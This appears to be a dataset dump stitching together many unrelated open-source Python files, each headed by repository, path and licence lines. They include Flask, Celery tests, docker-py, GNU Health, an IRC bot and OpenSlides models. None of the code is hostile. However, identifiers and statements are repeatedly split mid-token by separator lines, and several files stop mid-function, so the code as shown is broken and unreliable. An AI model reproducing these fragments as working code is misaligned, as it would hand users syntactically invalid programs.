from flask import Flask
from google.cloud import ndb
client = ndb.Client()
def ndb_wsgi_m
|
iddleware(wsgi_app):
def middleware(environ, start_response):
with client.context():
return wsgi_app(environ, start_response)
return middleware
app = Flask(__name__)
app.wsgi_app = ndb_wsgi_middleware(app.wsgi_app) # Wrap the app in middleware.
class Book(ndb.Model):
title = ndb.StringProperty()
@app.route('/')
def list_books():
books = Book.query()
return str([book.to_dict() for book in books])
# [END ndb_flask]
|
Sunhick/design-patterns
|
Behavioral/Command/Command.py
|
Python
|
gpl-3.0
| 230
| 0.008696
|
"""
Command.py
"""
from abc import ABCMeta, abstractmeth
|
od
class Command(object):
__metaclass__ = ABCMeta
@abstractmethod
def
|
execute(self):
pass
@abstractmethod
def unexecute(self):
pass
|
kawamon/hue
|
desktop/core/ext-py/celery-4.2.1/t/unit/worker/test_heartbeat.py
|
Python
|
apache-2.0
| 1,829
| 0
|
from __future__ import absolute_import, unicode_literals
from case import Mock
from celery.worker.heartbeat import Heart
class MockDispatcher(object):
heart = None
next_iter = 0
def __init__(self):
self.sent = []
self.on_enabled = set()
self.on_disabled = set()
|
self.enabled = True
def send(self, msg, **_fields):
self.sent.append(msg)
if self.heart:
if self.next_iter > 10:
self.heart._shutdown.set()
self.next_iter += 1
class MockTimer(object):
def call_repeatedly(self, secs, fun, args=(), kwargs={}):
class entry(tuple):
canceled = False
def cancel(self):
self.canc
|
eled = True
return entry((secs, fun, args, kwargs))
def cancel(self, entry):
entry.cancel()
class test_Heart:
def test_start_stop(self):
timer = MockTimer()
eventer = MockDispatcher()
h = Heart(timer, eventer, interval=1)
h.start()
assert h.tref
h.stop()
assert h.tref is None
h.stop()
def test_send_sends_signal(self):
h = Heart(MockTimer(), MockDispatcher(), interval=1)
h._send_sent_signal = None
h._send('worker-heartbeat')
h._send_sent_signal = Mock(name='send_sent_signal')
h._send('worker')
h._send_sent_signal.assert_called_with(sender=h)
def test_start_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.start()
assert not h.tref
def test_stop_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.stop()
|
whyDK37/py_bootstrap
|
samples/commonlib/use_sax.py
|
Python
|
apache-2.0
| 739
| 0
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from xml.parsers.expat import ParserCreate
class DefaultSaxHandler(object):
def start_element(self, name, attrs):
print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))
def end_element(self, name):
print('sax:end_element: %s' %
|
name)
def char_data(self, text):
print('sax:cha
|
r_data: %s' % text)
xml = r'''<?xml version="1.0"?>
<ol>
<li><a href="/python">Python</a></li>
<li><a href="/ruby">Ruby</a></li>
</ol>
'''
handler = DefaultSaxHandler()
parser = ParserCreate()
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data
parser.Parse(xml)
|
shakamunyi/docker-py
|
docker/unixconn/unixconn.py
|
Python
|
apache-2.0
| 3,189
| 0
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the Lic
|
ense at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required
|
by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import requests.adapters
import socket
if six.PY3:
import http.client as httplib
else:
import httplib
try:
import requests.packages.urllib3 as urllib3
except ImportError:
import urllib3
RecentlyUsedContainer = urllib3._collections.RecentlyUsedContainer
class UnixHTTPConnection(httplib.HTTPConnection, object):
def __init__(self, base_url, unix_socket, timeout=60):
super(UnixHTTPConnection, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.unix_socket = unix_socket
self.timeout = timeout
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect(self.unix_socket)
self.sock = sock
class UnixHTTPConnectionPool(urllib3.connectionpool.HTTPConnectionPool):
def __init__(self, base_url, socket_path, timeout=60):
super(UnixHTTPConnectionPool, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.socket_path = socket_path
self.timeout = timeout
def _new_conn(self):
return UnixHTTPConnection(self.base_url, self.socket_path,
self.timeout)
class UnixAdapter(requests.adapters.HTTPAdapter):
def __init__(self, socket_url, timeout=60):
socket_path = socket_url.replace('http+unix://', '')
if not socket_path.startswith('/'):
socket_path = '/' + socket_path
self.socket_path = socket_path
self.timeout = timeout
self.pools = RecentlyUsedContainer(10,
dispose_func=lambda p: p.close())
super(UnixAdapter, self).__init__()
def get_connection(self, url, proxies=None):
with self.pools.lock:
pool = self.pools.get(url)
if pool:
return pool
pool = UnixHTTPConnectionPool(
url, self.socket_path, self.timeout
)
self.pools[url] = pool
return pool
def request_url(self, request, proxies):
# The select_proxy utility in requests errors out when the provided URL
# doesn't have a hostname, like is the case when using a UNIX socket.
# Since proxies are an irrelevant notion in the case of UNIX sockets
# anyway, we simply return the path URL directly.
# See also: https://github.com/docker/docker-py/issues/811
return request.path_url
def close(self):
self.pools.clear()
|
CitrineInformatics/pypif
|
pypif/obj/common/instrument.py
|
Python
|
apache-2.0
| 2,048
| 0.000977
|
from six import string_types
from pypif.obj.common.pio import Pio
class Instrument(Pio):
"""
Information about an instrument used to take a measurement.
"""
def __init__(self, name=None, model=None, producer=None, url=None, tags=None, **kwargs):
"""
Constructor.
:param name: String with the name of the instrument.
:param model: String with the model of the instrument.
:param producer: String with the name of the producer of the instrument.
:param url: URL to the instrument website.
:param tags: List of strings or numbers that are tags for this object.
:param kwargs: Dictionary of fields that are not supported.
"""
super(Instrument, self).__init__(tags=tags, **kwargs)
self._name = None
self.name = name
self._model = None
self.model = model
self._producer = None
self.producer = producer
self._url = None
self.url = url
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._validate_type('name', name, string_types)
self._name = name
@name.deleter
def name(self):
self._name = None
@property
def model(self):
return self._model
@model.setter
def model(self, model):
self._validate_type('model', model, string_types)
self._model = model
@model.deleter
def model(self):
self._model = None
@property
def producer(self):
return self._producer
@producer.setter
def producer(self, producer):
self._validate_type('producer', producer, string_types)
self._producer = p
|
roducer
@producer.deleter
def producer(self):
self._producer = None
@property
def url(self):
return self._url
@url.setter
|
def url(self, url):
self._validate_type('url', url, string_types)
self._url = url
@url.deleter
def url(self):
self._url = None
|
stvstnfrd/edx-platform
|
openedx/core/djangoapps/programs/migrations/0013_customprogramsconfig.py
|
Python
|
agpl-3.0
| 1,294
| 0.003864
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2019-12-13 07:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
|
('programs', '0012_auto_20170419_0018'),
]
operations = [
migrations.CreateModel(
name='CustomProgramsConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),
('enabled
|
', models.BooleanField(default=False, verbose_name='Enabled')),
('arguments', models.TextField(blank=True, default='', help_text='Useful for manually running a Jenkins job. Specify like "--usernames A B --program-uuids X Y".')),
('changed_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, verbose_name='Changed by')),
],
options={
'verbose_name': 'backpopulate_program_credentials argument',
},
),
]
|
USGSDenverPychron/pychron
|
docs/user_guide/operation/scripts/examples/argus/measurement/jan_unknown_air_for_38Ar_600_180.py
|
Python
|
apache-2.0
| 2,496
| 0.014824
|
#!Measurement
'''
baseline:
after: true
before: false
counts: 180
detector: H1
mass: 34.2
settling_time: 20.0
default_fits: nominal
equilibration:
eqtime: 1.0
inlet: R
inlet_delay: 3
outlet: O
use_extraction_eqtime: true
post_equilibration_delay: 5
multicollect:
counts: 600
detector: H1
isotope: Ar40
peakcenter:
after: true
before: false
detector: H1
detectors:
- H1
- AX
- L2
- CDD
integration_time: 0.262144
isotope: Ar40
peakhop:
generate_ic_table: false
hops_name: ''
ncycles: 0
use_peak_hop: false
'''
ACTIVE_DETECTORS=('H2','H1','AX','L1','L2','CDD')
def main():
info('unknown measurement script')
set_deflection('CDD', 400)
activate_detectors(*ACTIVE_DETECTORS)
if mx.peakcenter.before:
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope)
if mx.baseline.before:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
position_magnet(mx.multicollect.isotope, detector=mx.multicollect.detector)
#sniff the gas during equilibration
if mx.equilibration.use_extraction_eqtime:
eqt = eqtime
else:
eqt = mx.equilibration.eqtime
'''
Equilibrate is non-blocking so use a sniff or sleep as a placeholder
e.g sniff(<equilibration_time>) or sleep(<equilibration_time>)
'''
equilibrate(eqtime=eqt, inlet=mx.equilibration.inlet, outlet=mx.equilibration.outlet,
delay=mx.equilibration.in
|
let_delay)
set_
|
time_zero()
sniff(eqt)
set_fits()
set_baseline_fits()
# delay to migitate 39Ar spike from inlet valve close
sleep(mx.equilibration.post_equilibration_delay)
#multicollect on active detectors
multicollect(ncounts=mx.multicollect.counts, integration_time=1)
if mx.baseline.after:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
if mx.peakcenter.after:
activate_detectors(*mx.peakcenter.detectors, **{'peak_center':True})
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope,
integration_time=mx.peakcenter.integration_time)
if use_cdd_warming:
gosub('warm_cdd', argv=(mx.equilibration.outlet,))
set_deflection('CDD', 50)
info('finished measure script')
|
cosminbasca/rdftools
|
rdftools/tools/jvmrdftools/__init__.py
|
Python
|
apache-2.0
| 3,224
| 0.001861
|
#
# author: Cosmin Basca
#
# Copyright 2010 University of Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import signal
from subprocess import Popen, PIPE, STDOUT, call
from threading import Thread
from natsort import natsorted
__author__ = 'basca'
__LIB_NAME__ = 'jvmrdftools-assembly-'
__LIB__ = os.path.join(os.path.dirname(os.path.realpath(__file__)), "lib")
__JARS__ = natsorted([(jar.replace(__LIB_NAME__, "").replace(".jar", ""),
os.path.join(__LIB__, jar))
for jar in os.listdir(__LIB__) if jar.startswith(__LIB_NAME__)],
key=lambda (ver, jar_file): ver)
def latest_jar():
global __JARS__
return __JARS__[-1]
class JavaNotFoundException(Exception):
pass
DEVNULL = open(os.devnull, 'w')
XMS = 128
XMX = 2048
def check_java(message=""):
if call(['java', '-version'], stderr=DEVNULL) != 0:
raise JavaNotFoundException(
'Java is not installed in the system path. {0}'.format(message))
def run_tool(main_class, xms=XMS, xmx=XMX, *options):
latest_version, jar_path = latest_jar()
command = ["java", "-Xms{0}m".format(xms), "-Xmx{0}m".format(xmx), "-classpath", jar_path, main_class] + \
[str(opt) for opt in options]
# call(command, stdout=PIPE, stdin=PIPE, stderr=STDOUT, preexec_fn=os.setsid)
call(command)
# ----------------------------------------------------------------------------------------------------------------------
#
# the specific tools
#
# ----------------------------------------------------------------------------------------------------------------------
def run_lubm_generator(num_universities, index, generator_seed, ontology, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.LubmGenerator",
xms, xmx,
"--num_universities", num_universities,
"--start_index", index,
"--seed", generator_seed,
"--ontology", ontology,
"--output_path", output_path)
def run_nxvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.NxVoidGenerator",
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_jvmvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.VoIDGenerator",
|
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_rdf2rdf_converter(source, destination, xms=XMS, xmx=XMX):
run_tool("com.rdftoo
|
ls.Rdf2RdfConverter",
xms, xmx,
source, destination)
|
RedMadRobot/rmr_django
|
rmr/middleware/json.py
|
Python
|
mit
| 1,109
| 0
|
import json
from django import http
from django.conf import settings
from rmr.types import JsonDict
class RequestDecoder:
content_type = 'application/json'
allowed_methods = {
'POST', 'PUT', 'PATCH',
}
def process_request(self, request):
if request.method not in self.allowed_methods:
return
content_type = request.META.get('CONTENT_TYPE', '')
if not content_type.startswith(self.content_type):
return
encoding = reques
|
t.encoding or settings.DEFAULT_CHARSET
try:
body = request.body.decode(encoding=encoding)
except UnicodeDecodeError:
return http.HttpResponseBadRequest('bad unicode')
try:
request.POST = self.json_decode(body)
except ValueError:
return http.HttpResponseBadRequest('malformed data')
@staticmethod
def json_decode(body):
|
data = json.loads(body)
if not isinstance(data, dict):
# all data of type other then dict will be returned as is
return data
return JsonDict(data)
|
synthomat/irc_topology_drawer
|
irc_topology_drawer.py
|
Python
|
apache-2.0
| 2,147
| 0.01211
|
#!/usr/bin/python
"""
Copyright 2012
Anton Zering <synth@lostprofile.de>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
try:
import yapgvb
import irclib
except:
print "Some dependencies could not been fulfilled. Exiting."
sys.exit(0)
SERVER = ("efnet.portlane.se", 6667)
NICK = "topologybot"
OUTPUT_FILE = "%s_topology.png" % SERVER[0]
def generate_links(links):
""" create a clique of n nodes """
# Create a new undirected graph
graph = yapgvb.Graph('%s-clique' % 10)
nodes = {}
for link in links:
nodes[link[0]] = graph.add_node(label= link[0])
for link in links:
if link[0] == link[1]:
continue
nodes[link[0]] >> nodes[link[1]]
graph.layout(yapgvb.engines.dot)
format = yapgvb.formats.png
filename = OUTPUT_FILE
graph.render(filename)
class IRCCat(irclib.SimpleIRCClient):
def __init__(self):
irclib.SimpleIRCClient.__init__(self)
self.links =
|
[]
def on_welcome(self, connection, event):
print "connected, fetching links"
connection.links()
def on_links(self, connection, event):
print event.arguments()
self.links.append(event.arguments())
def on_endoflinks(self, connection, event):
print "rendering"
generate_links(self.links)
connection.discon
|
nect()
def on_disconnect(self, connection, event):
sys.exit(0)
def main():
c = IRCCat()
try:
print "connecting"
c.connect(SERVER[0], SERVER[1], NICK)
except irclib.ServerConnectionError, x:
print x
sys.exit(1)
c.start()
if __name__ == "__main__":
main()
|
kbsymanz/gnuhealth_mmc
|
mmc.py
|
Python
|
mit
| 35,273
| 0.003714
|
# -------------------------------------------------------------------------------
# mmc.py
#
# Customization of GnuHealth for the needs of Mercy Maternity Clinic, Inc.
# -------------------------------------------------------------------------------
from trytond.model import ModelView, ModelSingleton, ModelSQL, fields
from trytond.pyson import Eval, Not, Bool, Or, And
from trytond.pool import Pool
import datetime
import logging
__all__ = [
'MmcReports',
'MmcSequences',
'MmcPatientData',
'MmcPatientDiseaseInfo',
'MmcVaccination',
'MmcPatientMedication',
'MmcMedicationTemplate',
'MmcPatientPregnancy',
'MmcPrenatalEvaluation',
'MmcPerinatal',
'MmcPerinatalMonitor',
'MmcPuerperiumMonitor',
'Address',
'MmcPostpartumContinuedMonitor',
'MmcPostpartumOngoingMonitor',
]
mmcLog = logging.getLogger('mmc')
def month_num_to_abbrev(num):
mon = {}
mon['01'] = 'Jan'
mon['02'] = 'Feb'
mon['03'] = 'Mar'
mon['04'] = 'Apr'
mon['05'] = 'May'
mon['06'] = 'Jun'
mon['07'] = 'Jul'
mon['08'] = 'Aug'
mon['09'] = 'Sep'
mon['10'] = 'Oct'
mon['11'] = 'Nov'
mon['12'] = 'Dec'
return mon[num]
class MmcReports(ModelSingleton, ModelSQL, ModelView):
'Class for custom reports'
__name__ = 'mmc.reports'
class MmcSequences(ModelSingleton, ModelSQL, ModelView):
"Sequences for MMC"
__name__ = "mmc.sequences"
doh_sequence = fields.Property(fields.Many2One('ir.sequence',
'DOH Sequence', domain=[('code', '=', 'mmc.doh')],
required=True))
class MmcPatientData(ModelSQL, ModelView):
'Patient related information'
__name__ = 'gnuhealth.patient'
# --------------------------------------------------------
# Hide these fields
# --------------------------------------------------------
family = fields.Many2One('gnuhealth.family', 'x',
states={'invisible': True})
primary_care_doctor = fields.Many2One('gnuhealth.physician', 'x',
states={'invisible': True})
current_insurance = fields.Many2One('gnuhealth.insurance', 'x',
states={'invisible': True})
# --------------------------------------------------------
# Expand the selection list of these fields.
# --------------------------------------------------------
marital_status = fields.Function(
fields.Selection([
(None, ''),
('l', 'Live-in'),
('s', 'Single'),
('m', 'Married'),
|
('c', 'Concubinage'),
('w', 'Widowed'),
('d', 'Divorced'),
('x', 'Separated'),
], 'Marital Status', sort=False), 'get_patient_marital_status')
rh = fields.Selection([
('u', 'Unknown'),
('+', '+'),
('-', '-'),
], 'Rh')
# --------------------------------------------------------
# Change the label on these fields.
# --------------------------------------------------------
diseases = fields.One2Many('gnuhealth.patient.disease', 'name', 'Condition')
gravida = fields.Integer ('G', required=True)
abortions = fields.Integer('A')
stillbirths = fields.Integer('S')
# --------------------------------------------------------
# Add Pregnancy fields.
# --------------------------------------------------------
living = fields.Integer('L') # number of live births
para = fields.Integer('P') # number of times given birth
term = fields.Integer('Term') # number of pregnancies to full term
preterm = fields.Integer('Preterm') # number of pregnancies not to full term
# --------------------------------------------------------
# Add Phil Health related fields.
# --------------------------------------------------------
phil_health = fields.Boolean('Phil Health',
help='Mark if the patient has Phil Health')
phil_health_mcp = fields.Boolean('MCP',
help="If MCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_ncp = fields.Boolean('NCP',
help="If NCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_id = fields.Char('PHIC#',
size=14,
help="The patients Phil Health ID number",
states={
'invisible': Not(Bool(Eval('phil_health'))),
'required': Bool(Eval('phil_health'))
},
on_change=['phil_health_id'],
depends=['phil_health'])
# --------------------------------------------------------
# Add new screening related fields.
# --------------------------------------------------------
gram_stain = fields.Boolean('Gram Stain',
help="Check if gram stain was done")
breast_self_exam_taught = fields.Boolean('Taught breast self exam',
help="Check if patient has been taught how to do breast self exams")
# --------------------------------------------------------
# Department of Health required id (aka MMC ID#).
# --------------------------------------------------------
doh_id = fields.Char('MMC ID',
size=8,
help="Dept of Health id", required=False,
select=True, on_change=['doh_id'])
# --------------------------------------------------------
# Format DOH ID # in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_doh_id(self):
origFld = self.doh_id
doh = origFld.replace('-', '')
val = origFld
if ((len(doh) == 6) and (doh.isdigit())):
val = "{0}-{1}-{2}".format(doh[:2], doh[2:4], doh[4:6])
return {'doh_id': val}
# --------------------------------------------------------
# Format PHIC# in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_phil_health_id(self):
origFld = self.phil_health_id
phic = origFld.replace('-', '')
val = origFld
if ((len(phic) == 12) and (phic.isdigit())):
val = "{0}-{1}-{2}".format(phic[:2], phic[2:11], phic[-1])
return {'phil_health_id': val}
# --------------------------------------------------------
# Validate the DOH ID.
# --------------------------------------------------------
@staticmethod
def validate_doh_id(ids):
for patientData in ids:
if (patientData.doh_id == None or len(patientData.doh_id) == 0):
return True
doh = patientData.doh_id.replace('-', '')
if (len(doh) != 6):
return False
if (not doh.isdigit()):
return False
return True
# --------------------------------------------------------
# Validate the PHIC #.
# --------------------------------------------------------
@staticmethod
def validate_phil_health_id(ids):
for patientData in ids:
if not patientData.phil_health:
# if Phil Health does not apply, then we are fine.
return True
phic = patientData.phil_health_id.replace('-', '')
if (len(phic) != 12):
mmcLog.info('Phil Health id is not the correct length')
return False
if (not phic.isdigit()):
mmcLog.info('Phil Health id is not a number')
return False
return True
# --------------------------------------------------------
# Set a reasonable default sex for a maternity clinic.
# --------------------------------------------------------
@staticmethod
def default_sex():
return 'f'
# --------------------------------------------------------
# 99.4% of all people in the Philippines are RH positive.
# Oftentimes blood tests do not
|
|
jejimenez/django
|
tests/handlers/tests_custom_error_handlers.py
|
Python
|
bsd-3-clause
| 888
| 0
|
from django.conf.urls import url
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.test import SimpleTestCase, override_settings
def template_response_error_handler(request, exception=None):
return TemplateResponse(request, 'test_handler.html', status=403)
def permission_denied_view(re
|
quest):
raise PermissionDenied
urlpatterns = [
url(r'^$', permission_denied_view),
]
handler403 = template_response_error_handler
@override_settings(ROOT_URLCONF='handlers.tests_custom_error_handlers')
class CustomErrorHandlerTests(SimpleTestCase):
def test_handler_renders_template_response(self):
"""
BaseHandler should render TemplateResponse if necessary.
"""
|
response = self.client.get('/')
self.assertContains(response, 'Error handler content', status_code=403)
|
andrebellafronte/stoq
|
stoqlib/gui/base/slaves.py
|
Python
|
gpl-2.0
| 1,749
| 0.007433
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2005, 2006 Async Open Source
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
""" Basic slave definitions """
from stoqlib.lib.translation import stoqlib_gettext
from stoqlib.gui.editors.baseeditor import BaseEditorSlave
_ = stoqlib_gettext
# FIXME: s/NoteSlave/NotesSlave/ and move this to stoqlib.gui.slaves.notesslave
class NoteSlave(
|
BaseEditorSlave):
""" Slave store general notes. The model must have an attribute 'notes'
to work.
"""
gladefile = 'NoteSlave'
proxy_widgets = ('notes', )
def __
|
init__(self, store, model, visual_mode=False):
self.model = model
self.model_type = self.model_type or type(model)
BaseEditorSlave.__init__(self, store, self.model,
visual_mode=visual_mode)
self.notes.set_accepts_tab(False)
def setup_proxies(self):
self.proxy = self.add_proxy(self.model,
NoteSlave.proxy_widgets)
|
emesene/papyon
|
papyon/service/description/OIM/Store2.py
|
Python
|
gpl-2.0
| 3,213
| 0.009648
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Johann Prieur <johann.prieur@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
import xml.sax.saxutils as xml
def soap_header(from_member_name, friendly_name, proxy, msnp_ver, build_ver,
to_member_name, message_number, security_token, app_id,
lock_key):
"""Return
|
s the SOAP
|
xml header"""
# FIXME : escape the parameters
return """<From memberName="%(from_member_name)s" friendlyName="%(friendly_name)s" xml:lang="en-US" proxy="%(proxy)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/" msnpVer="%(msnp_ver)s" buildVer="%(build_ver)s"/>
<To memberName="%(to_member_name)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Ticket passport="%(passport)s" appid="%(app_id)s" lockkey="%(lock_key)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Sequence xmlns="http://schemas.xmlsoap.org/ws/2003/03/rm">
<Identifier xmlns="http://schemas.xmlsoap.org/ws/2002/07/utility">
http://messenger.msn.com
</Identifier>
<MessageNumber>%(message_number)s</MessageNumber>
</Sequence>""" % { 'from_member_name' : from_member_name,
'friendly_name' : friendly_name,
'proxy' : proxy,
'msnp_ver' : msnp_ver,
'build_ver' : build_ver,
'to_member_name' : to_member_name,
'passport' : xml.escape(security_token),
'app_id' : app_id,
'lock_key' : lock_key,
'message_number' : message_number }
def transport_headers():
"""Returns a dictionary, containing transport (http) headers
to use for the request"""
return {}
def soap_action():
"""Returns the SOAPAction value to pass to the transport
or None if no SOAPAction needs to be specified"""
return "http://messenger.live.com/ws/2006/09/oim/Store2"
def soap_body(message_type, message_content):
"""Returns the SOAP xml body"""
return """<MessageType xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</MessageType>
<Content xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</Content>""" % (message_type, message_content)
def process_response(soap_response):
return True
|
jwinzer/OpenSlides
|
server/openslides/users/models.py
|
Python
|
mit
| 12,597
| 0.001111
|
import smtplib
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
Group as DjangoGroup,
GroupManager as _GroupManager,
Permission,
PermissionsMixin,
)
from django.core import mail
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db import models
from django.db.models import Prefetch
from django.utils import timezone
from jsonfield import JSONField
from openslides.utils.manager import BaseManager
from ..core.config import config
from ..utils.auth import GROUP_ADMIN_PK
from ..utils.autoupdate import inform_changed_data
from ..utils.models import (
CASCADE_AND_AUTOUPDATE,
SET_NULL_AND_AUTOUPDATE,
RESTModelMixin,
)
from .access_permissions import (
GroupAccessPermissions,
PersonalNoteAccessPermissions,
UserAccessPermissions,
)
class UserManager(BaseUserManager):
"""
Customized manager that creates new users only with a password and a
username. It also supports our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, ids=None):
"""
Returns the normal queryset with all users. In the background all
groups are prefetched from the database together with all permissions
and content types.
"""
queryset = self.get_queryset()
if ids:
queryset = queryset.filter(pk__in=ids)
return queryset.prefetch_related(
Prefetch(
"groups",
queryset=Group.objects.select_related("group_ptr").prefetch_related(
Prefetch(
"permissions",
queryset=Permission.objects.select_related("content_type"),
)
),
),
"vote_delegated_from_users",
)
def create_user(self, username, password, skip_autoupdate=False, **kwargs):
"""
Creates a new user only with a password and a username.
"""
user = self.model(username=username, **kwargs)
user.set_password(password)
user.save(skip_autoupdate=skip_autoupdate, using=self._db)
return user
def create_or_reset_admin_user(self, skip_autoupdate=False):
"""
Creates an user with the username 'admin'. If such a user already
exists, resets it. The password is (re)set to 'admin'. The user
becomes member of the group 'Admin'.
"""
created = False
try:
admin = self.get(username="admin")
except ObjectDoesNotExist:
admin = self.model(username="admin", last_name="Administrator")
created = True
admin.default_password = "admin"
admin.password = make_password(admin.default_password)
admin.save(skip_autoupdate=skip_autoupdate)
admin.groups.add(GROUP_ADMIN_PK)
if not skip_autoupdate:
inform_changed_data(admin)
return created
def generate_username(self, first_name, last_name):
"""
Generates a username from first name and last name.
"""
first_name = first_name.strip()
last_name = last_name.strip()
if first_name and last_name:
base_name = " ".join((first_name, last_name))
else:
base_name = first_name or last_name
if not base_name:
raise ValueError(
"Either 'first_name' or 'last_name' must not be empty."
)
if not self.filter(username=base_name).exists():
generated_username = base_name
else:
counter = 0
while True:
counter += 1
test_name = f"{base_name} {counter}"
if not self.filter(username=test_name).exists():
generated_username = test_name
break
return generated_username
class User(RESTModelMixin, PermissionsMixin, AbstractBaseUser):
"""
Model for users in OpenSlides. A client can login as an user with
credentials. An user can also just be used as representation for a person
in other OpenSlides apps like motion submitter or (assignment) election
candidates.
"""
access_permissions = UserAccessPermissions()
USERNAME_FIELD = "username"
username = models.CharField(max_length=255, uniq
|
ue=True, blank=True)
auth_type = models.CharField(max_length=64, default="default")
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
gender =
|
models.CharField(max_length=255, blank=True)
email = models.EmailField(blank=True)
last_email_send = models.DateTimeField(blank=True, null=True)
# TODO: Try to remove the default argument in the following fields.
structure_level = models.CharField(max_length=255, blank=True, default="")
title = models.CharField(max_length=50, blank=True, default="")
number = models.CharField(max_length=50, blank=True, default="")
about_me = models.TextField(blank=True, default="")
comment = models.TextField(blank=True, default="")
default_password = models.CharField(max_length=100, blank=True, default="")
is_active = models.BooleanField(default=True)
is_present = models.BooleanField(default=False)
is_committee = models.BooleanField(default=False)
vote_weight = models.DecimalField(
default=Decimal("1"), max_digits=15, decimal_places=6, null=False, blank=True
)
vote_delegated_to = models.ForeignKey(
"self",
on_delete=SET_NULL_AND_AUTOUPDATE,
null=True,
blank=True,
related_name="vote_delegated_from_users",
)
objects = UserManager()
class Meta:
default_permissions = ()
permissions = (
("can_see_name", "Can see names of users"),
(
"can_see_extra_data",
"Can see extra data of users (e.g. email and comment)",
),
("can_change_password", "Can change its own password"),
("can_manage", "Can manage users"),
)
ordering = ("last_name", "first_name", "username")
def __str__(self):
# Strip white spaces from the name parts
first_name = self.first_name.strip()
last_name = self.last_name.strip()
